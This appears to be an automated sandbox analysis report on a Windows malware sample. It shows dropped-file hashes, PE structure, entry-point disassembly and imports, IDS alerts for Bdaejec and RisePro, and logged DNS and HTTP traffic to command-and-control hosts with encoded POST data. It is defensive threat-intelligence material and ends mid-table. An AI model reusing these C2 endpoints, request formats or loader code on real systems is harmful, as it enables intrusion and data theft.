                                              Category:dropped
                                              Size (bytes):147708
                                              Entropy (8bit):1.6876662396078015
                                              Encrypted:false
                                              SSDEEP:384:1Oj+OlfBowTzKFFd9G/A9Kt1bOEd8RFNKzS71CjMbVTpynAVQh:1krfBowT1I4zlqFqS71CjMbVTpynC
                                              MD5:1C7A7981C47E63DFCC423BC9585FB26A
                                              SHA1:16009A071D566ECE7222352DB6C575CE319CB725
                                              SHA-256:F9B2A57213BCE85C36B3481BB12FEA6EA034E358B6ACCB313559E3068E4582D6
                                              SHA-512:CA59C02F05B1F133AAE63E139E157C70CACAE55F3B87B620B0ADE65FBCB2FDCD226C39723DAE087C7344B39A6DD0AB174BE526A4EAD88E5E3E37816F73E22DE3
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......?..f............D...............L...........ZH..........T.......8...........T............5..T...........L...........8...............................................................................eJ..............GenuineIntel............T...........9..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8370
                                              Entropy (8bit):3.704133213465768
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJla6uG6YjJ6WgmfmJd7pDG89b/Isf61m:R6lXJ46H6YN6WgmfmzB/7fR
                                              MD5:15E09E59A12BA72BBEB5DA58E752DD63
                                              SHA1:D6D7405DF224EA6D462AE7210C90442F0FCBDD4C
                                              SHA-256:BCC7FEB1A666DA1AC1E823A4F507BCBAF5FB31D55BBD1815E048BA2F09605E1B
                                              SHA-512:5F6C09B539FE18D70858A8C9B075A96637AAED14A6C435FA8E36F9F834422BB50ACA51177672B5FB1D694831AC1E3D59D1A5CA565E6588B3423365CB0EA4972D
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.6.4.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4551
                                              Entropy (8bit):4.45225027094147
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsKiJg77aI9f8WpW8VYnHYm8M4JASFY+q8uMNWTpg65d:uIjfjI7Z17VQaJmVTpg65d
                                              MD5:DC9054E1EBE5DC9BA7901543135A5AD1
                                              SHA1:6544A323CB37BD9ECC39E84FF183E3B0744C6B10
                                              SHA-256:8619154F69CCC632CB1D3B0192F00AEDA0E083A8F2BEE101ECEF5024C91C0C6C
                                              SHA-512:F7E9DD104307B5CF22098068B8C74B8BFCD990CA26DA676D79267ABBF66F690803675CC186B0F0FD98B19F274996F400715609776C1D4A4C1F9A0E5039A88018
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425189" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):15872
                                              Entropy (8bit):7.031075575407894
                                              Encrypted:false
                                              SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                                              MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                                              SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                                              SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                                              SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 92%
                                              Joe Sandbox View:
                                              • Filename: 5A1FB27924AB99541F08D3A46321B88FA4CE52A2346EBD92DC8DA423C907CDE3.exe, Detection: malicious, Browse
                                              • Filename: 5AECB2A5BC5447DC736C29882193FEF4F2B007299A1817C664E1BA6A028363CF.exe, Detection: malicious, Browse
                                              • Filename: 58BB54DE7A3ED504F85202B0CD55AC2DA9FC821B5695AA854703F885CD80B044.exe, Detection: malicious, Browse
                                              • Filename: 5673773206126F12F4692E91C084B927357D9CF5FA3D5C312D89C9942B5C90FE.exe, Detection: malicious, Browse
                                              • Filename: 56586BDA88E32BE6A2AE5BA59A06127DC382CA0D5619DFDFE0DD0353EE4877AB.exe, Detection: malicious, Browse
                                              • Filename: 54E3EE54FAC434E25C03DED56A4680F1EA40A245D657440AC9C51BE7F27EF656.exe, Detection: malicious, Browse
                                              • Filename: 55282E8B63997F62AF3DD4B9D40CACB30A72D8DB1597D3F53057839CF7335750.exe, Detection: malicious, Browse
                                              • Filename: 550F.exe, Detection: malicious, Browse
                                              • Filename: 4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exe, Detection: malicious, Browse
                                              • Filename: 537C7A26CE5E39643B98D9C078A14D5E955F0FCCF49073D05B1F8E3294636B41.exe, Detection: malicious, Browse
                                              Reputation:moderate, very likely benign file
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.421552723020453
                                              Encrypted:false
                                              SSDEEP:6144:PSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN00uhiTw:avloTMW+EZMM6DFyy03w
                                              MD5:F9084DEA8AB3B72D9909BE1FE750CD2F
                                              SHA1:9F99B1868C7A8316596B46857641EF01786C6E36
                                              SHA-256:123A1F3FA172C05ADCB0220BA085C3033F22FF237C7330CB0D5B9A5255FE7B92
                                              SHA-512:6D9D67B4F390DDC43529DC46F47F91D3FD337FE26E9CA9DE75EA018944C8E5FB16D3F1A001EDE6739912679A17EB1AD07582741C0D086756F6A0835635992EAC
                                              Malicious:false
                                              Reputation:low
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.400989577134585
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                              File size:411'648 bytes
                                              MD5:5ae2c7e495880d7e209a41158fd72984
                                              SHA1:f2bd4549f77a5c6af49259b60caf937b31decbf0
                                              SHA256:9664f55603f168dc5f7ac498789f5275b2c64fb5ad1bc7c185944421bd5a8777
                                              SHA512:16364431e2d8b0e48189f571b1b713da08129ea3b00d18723d981b7ace39b9d1cd7b55d4a48ea53bb8e7940f0c76ef70b5614a5a8d08bdb73827539e4cc7d5cf
                                              SSDEEP:12288:MZFjgB8S7dgKfFTJnUxzJQK2LM0r04JduPK1LOE/BE:M3jgCS7BFnUbR60wLLOSi
                                              TLSH:43946B34E601F026F4E20035EC5ED7FA65286B30275498EFF3D54EA9AAB16D1E230B57
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x464000
                                              Entrypoint Section:ku
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x623EAAFA [Sat Mar 26 05:56:10 2022 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:9734ba8626408cec04bb8fa7d8bb6e83
                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 0000016Ch
                                              xor eax, eax
                                              push ebx
                                              push esi
                                              push edi
                                              mov dword ptr [ebp-24h], eax
                                              mov dword ptr [ebp-10h], eax
                                              mov dword ptr [ebp-14h], eax
                                              mov dword ptr [ebp-08h], eax
                                              mov dword ptr [ebp-0Ch], eax
                                              mov dword ptr [ebp-20h], eax
                                              mov dword ptr [ebp-18h], eax
                                              mov dword ptr [ebp-48h], 70515876h
                                              mov dword ptr [ebp-44h], 652E4175h
                                              mov dword ptr [ebp-40h], 00006578h
                                              mov dword ptr [ebp-3Ch], 00000000h
                                              call 00007EFCFCEB5D75h
                                              pop eax
                                              add eax, 00000225h
                                              mov dword ptr [ebp-04h], eax
                                              mov eax, dword ptr fs:[00000030h]
                                              mov dword ptr [ebp-28h], eax
                                              mov eax, dword ptr [ebp-04h]
                                              mov dword ptr [eax], E904C483h
                                              mov eax, dword ptr [ebp-04h]
                                              mov dword ptr [eax+04h], FFFD57E4h
                                              mov eax, dword ptr [ebp-28h]
                                              mov eax, dword ptr [eax+0Ch]
                                              mov eax, dword ptr [eax+1Ch]
                                              mov eax, dword ptr [eax]
                                              mov eax, dword ptr [eax+08h]
                                              mov ecx, dword ptr [eax+3Ch]
                                              mov ecx, dword ptr [ecx+eax+78h]
                                              add ecx, eax
                                              mov edi, dword ptr [ecx+1Ch]
                                              mov ebx, dword ptr [ecx+20h]
                                              mov esi, dword ptr [ecx+24h]
                                              mov ecx, dword ptr [ecx+18h]
                                              add esi, eax
                                              add edi, eax
                                              add ebx, eax
                                              xor edx, edx
                                              mov dword ptr [ebp-30h], esi
                                              mov dword ptr [ebp-1Ch], edx
                                              mov dword ptr [ebp-34h], ecx
                                              cmp edx, dword ptr [ebp-34h]
                                              jnc 00007EFCFCEB5EBEh
                                              movzx ecx, word ptr [esi+edx*2]
                                              mov edx, dword ptr [ebx+edx*4]
                                              mov esi, dword ptr [edi+ecx*4]
                                              add edx, eax
                                              mov ecx, dword ptr [edx]
                                              add esi, eax
                                              cmp ecx, 4D746547h
                                              jne 00007EFCFCEB5DC4h
                                              cmp dword ptr [edx+04h], 6C75646Fh
                                              jne 00007EFCFCEB5DBBh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5d348 | 0x64 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x60000 | 0x1e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x61000 | 0x2584 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5a620 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5a658 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x53000 | 0x1bc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x51e2f | 0x52000 | 1194472e2597aa2b13244e79144d4bce | False | 0.4684939500762195 | data | 6.289312713354304 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x53000 | 0xad56 | 0xae00 | 5f1fb1910534a3337bd13bc47de54e80 | False | 0.4108072916666667 | data | 5.0095148798074804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5e000 | 0x17ec | 0xc00 | 41c953f6fa233668d764d083f279d54f | False | 0.189453125 | data | 2.8141571695432828 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x60000 | 0x1e8 | 0x200 | 17468f9d018731f1fbdeb298bbd3cd73 | False | 0.5390625 | data | 4.756146432197578 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x61000 | 0x2584 | 0x2600 | e29e1f7c8bb4987b63b6921906d4431e | False | 0.7485608552631579 | data | 6.562239697735675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
ku | 0x64000 | 0x5000 | 0x4200 | 7dcacc3fac3b8a0c73928c715c8e9b38 | False | 0.7775213068181818 | data | 6.934525403554348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x60060 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
KERNEL32.dll | CreateDirectoryA, IsWow64Process, lstrcatA, GetModuleHandleA, lstrcpyA, WinExec, lstrlenA, HeapAlloc, GetProcAddress, lstrcpynA, GetProcessHeap, WriteConsoleW, LocalFree, GetWindowsDirectoryA, CloseHandle, DeleteFileA, LoadLibraryA, GetFileAttributesA, GetLastError, CopyFileA, Sleep, LocalAlloc, GetVolumeInformationA, GetCurrentProcess, HeapFree, GetModuleFileNameA, SetEndOfFile, HeapReAlloc, HeapSize, ReadConsoleW, ReadFile, FlushFileBuffers, CreateFileW, GetStringTypeW, SetStdHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, MultiByteToWideChar, LCMapStringW, MoveFileExW, GetFileType, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
ADVAPI32.dll | CreateServiceA, RegCloseKey, StartServiceCtrlDispatcherA, GetCurrentHwProfileA, CloseServiceHandle, RegQueryValueExA, SetServiceStatus, RegisterServiceCtrlHandlerA, OpenSCManagerA, GetUserNameA, StartServiceA, RegOpenKeyExA, OpenServiceA
SHELL32.dll | SHGetSpecialFolderPathA, SHGetFolderPathA, ShellExecuteA
SETUPAPI.dll | SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiEnumDeviceInfo
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-24T17:26:53.131145+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 60858 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-24T17:26:51.124380+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 60858 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-24T17:26:52.119126+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 60858 | 53 | 192.168.2.5 | 1.1.1.1
2024-07-24T17:27:38.899025+0200 | UDP | 2043080 | ET MALWARE Observed DNS Query to RisePro Domain (softs-portal .com) | 52169 | 53 | 192.168.2.5 | 1.1.1.1
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 24, 2024 17:26:51.124380112 CEST192.168.2.51.1.1.10x9c5fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:51.154299021 CEST192.168.2.51.1.1.10xfaf5Standard query (0)telegram.orgA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:52.119126081 CEST192.168.2.51.1.1.10x9c5fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:53.131145000 CEST192.168.2.51.1.1.10x9c5fStandard query (0)ddos.dnsnb8.netA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.495867014 CEST192.168.2.51.1.1.10x1d9fStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:37.550316095 CEST192.168.2.51.1.1.10xccd1Standard query (0)wfsdragon.ruA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.899024963 CEST192.168.2.51.1.1.10xc779Standard query (0)softs-portal.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 24, 2024 17:26:51.171768904 CEST1.1.1.1192.168.2.50xfaf5No error (0)telegram.org149.154.167.99A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:55.135660887 CEST1.1.1.1192.168.2.50x9c5fServer failure (2)ddos.dnsnb8.netnonenoneA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:55.135715961 CEST1.1.1.1192.168.2.50x9c5fServer failure (2)ddos.dnsnb8.netnonenoneA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:26:55.135817051 CEST1.1.1.1192.168.2.50x9c5fServer failure (2)ddos.dnsnb8.netnonenoneA (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.503290892 CEST1.1.1.1192.168.2.50x1d9fNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.503290892 CEST1.1.1.1192.168.2.50x1d9fNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:36.503290892 CEST1.1.1.1192.168.2.50x1d9fNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.052373886 CEST1.1.1.1192.168.2.50xccd1No error (0)wfsdragon.ru172.67.133.215A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.052373886 CEST1.1.1.1192.168.2.50xccd1No error (0)wfsdragon.ru104.21.5.208A (IP address)IN (0x0001)false
                                              Jul 24, 2024 17:27:38.910533905 CEST1.1.1.1192.168.2.50xc779Name error (3)softs-portal.comnonenoneA (IP address)IN (0x0001)false
                                              • telegram.org
                                              • pastebin.com
                                              • 212.193.30.45
                                              • 212.193.30.29
                                              • wfsdragon.ru
                                              • 212.193.30.21
                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               0 | 192.168.2.5 | 49705 | 212.193.30.45 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:26:52.516983032 CEST | 203 | OUT | GET /proxies.txt HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: 212.193.30.45


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               1 | 192.168.2.5 | 49723 | 212.193.30.29 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:27:15.124949932 CEST | 202 | OUT | GET /server.txt HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: 212.193.30.29


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               2 | 192.168.2.5 | 49725 | 172.67.133.215 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:27:38.060959101 CEST | 207 | OUT | GET /api/setStats.php HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Host: wfsdragon.ru
                                               Jul 24, 2024 17:27:38.895979881 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 24 Jul 2024 15:27:38 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HEB0ODgbQzdwXbrO%2Fmpcx54rLT3TkSjyztoRT9GMG4OZ5uvC42Wh%2FHFnkCtG3M1maOMLwGfOWQirUg6Hnn8v1vkJfbpuzpi%2F3vDyLzjPstrI%2FskReRpENmzfzUQepU%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a84ef7a1d151a30-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8a84ef7a1d151a30',t:'MTcyMTgzNDg1OC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.create
                                               Jul 24, 2024 17:27:38.896150112 CEST | 499 | IN
                                              Data Ascii: Element('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListen


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               3 | 192.168.2.5 | 49726 | 212.193.30.21 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:27:38.920288086 CEST | 287 | OUT | POST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                               Jul 24, 2024 17:27:38.920495987 CEST | 25 | OUT | Data Raw: 64 61 74 61 3d 6d 37 6d 6f 69 72 6d 75 72 37 57 7a 73 71 44 73 38 75 51 3d
                                              Data Ascii: data=m7moirmur7WzsqDs8uQ=


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               4 | 192.168.2.5 | 49729 | 212.193.30.21 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:28:00.345628023 CEST | 287 | OUT | POST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                               Jul 24, 2024 17:28:00.345663071 CEST | 25 | OUT | Data Raw: 64 61 74 61 3d 52 32 56 30 56 6d 56 79 63 32 6c 76 62 6e 77 77 4c 6a 67 3d
                                              Data Ascii: data=R2V0VmVyc2lvbnwwLjg=


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               5 | 192.168.2.5 | 49730 | 212.193.30.21 | 80 | 3792 | C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 24, 2024 17:28:21.837099075 CEST | 287 | OUT | POST /service/communication.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                              Content-Length: 25
                                              Host: 212.193.30.21
                                               Jul 24, 2024 17:28:21.837116957 CEST | 25 | OUT | Data Raw: 64 61 74 61 3d 6d 37 6d 6f 69 72 6d 75 72 37 57 7a 73 71 44 73 38 75 51 3d
                                              Data Ascii: data=m7moirmur7WzsqDs8uQ=


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
